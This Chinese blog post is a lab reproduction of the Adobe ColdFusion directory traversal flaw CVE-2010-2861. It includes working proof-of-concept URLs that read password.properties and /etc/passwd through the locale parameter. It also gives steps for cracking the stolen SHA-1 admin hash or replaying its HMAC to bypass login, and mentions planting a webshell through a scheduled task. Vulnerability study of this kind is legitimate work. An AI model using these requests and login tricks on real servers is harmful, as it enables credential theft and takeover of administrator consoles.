Adobe_ColdFusion文件读取漏洞 CVE-2010-2861 漏洞复现

Adobe ColdFusion文件读取漏洞(CVE-2010-2861)

by ADummy

0x00利用路线

​ Burpsuite抓包改包—>直接读取文件—>有回显

0x01漏洞介绍

​ AdobeColdFusion是一款高效的网络应用服务器开发环境。AdobeColdFusion9.0.1及之前版本的管理控制台中存在多个目录遍历漏洞。远程攻击者可借助向CFIDE/administrator/中的CFIDE/administrator/settings/mappings.cfm,logging/settings.cfm,datasources/index.cfm,j2eepackaging/editarchive.cfm和enter.cfm发送的locale参数读取任意文件。

影响版本
	ColdFusion MX6 6.1 base patches  
    ColdFusion MX7 7,0,0,91690 base patches        无补丁
    ColdFusion MX8 8,0,1,195765 base patches  
    ColdFusion MX8 8,0,1,195765 with Hotfix4
查看版本信息tips:
	 http://target.com/CFIDE/adminapi/base.cfc?wsdl

0x02漏洞复现

poc:
http://target.com/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en

http://target.com/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en

http://target.com/CFIDE/administrator/enter.cfm?locale=../../../../../../../servers/cfusion/cfusion-ear/cfusion-war/WEB-INF/cfusion/lib/password.properties%00en	

文章有exp链接,需要自取

服务器启动可能需要1到5分钟。之后,访问http://your-ip:8500/CFIDE/administrator/enter.cfm以查看初始化页面,输入密码admin以初始化整个服务器。
在这里插入图片描述

/etc/passwd
在这里插入图片描述

后台管理员密码
在这里插入图片描述

密码是用sha-1加密过的,可以到http://www.md5decrypter.co.uk/sha1-decrypt.aspx这儿去破解下

破解出来后直接登录即可。

在这里插入图片描述

后台获取webshell,添加计划任务后执行,远程下载一个shell到本地目录

PS:以下我没复现出来,有复现出来的大佬带带弟弟。

Tips(摘抄自文章末链接): 如果密码破解不出怎么办?放弃?当然不是,这里有个小技巧。coldfusion的密码在验证的时候,是把输入的密码加salt进行HMAC hash后传给服务器,由服务器去计算后验证。所以这时候我们只要传输过去正确的加密后的密码即可成功进入,而不必在那破密码了。但是问题是如何计算 HMAC值。

其实方法很简单,只要用js调用页面里的加密函数即可(页面每30秒刷新一次,所以下手要快),方法如下,这里我用firebug演示了~:

1.F12调出管理控制台

2.进入控制台选项

3.在下面输入hex_hmac_sha1(document.loginform.salt.value,”password”) password是你获取到的那个加密后的密码

4.回车,得到一个字符串,如下图:

5.打开burpsuit或者什么的,用来修改数据包用到,这里用tamper data插件,点击start tamper 后点登录,截断修改传送的cfadminPassword值为上面js获取的那个字符串值

6.一路submit,成功不用解密密码进入后台

在这里插入图片描述

0x03参考资料

https://www.cnblogs.com/mujj/articles/3714722.html

exp:https://github.com/ADummmy/vulhub_Writeup/blob/main/code/Adobe_ColdFusionCVE-2010-2861.py

猜你喜欢

转载自blog.csdn.net/weixin_43416469/article/details/113932085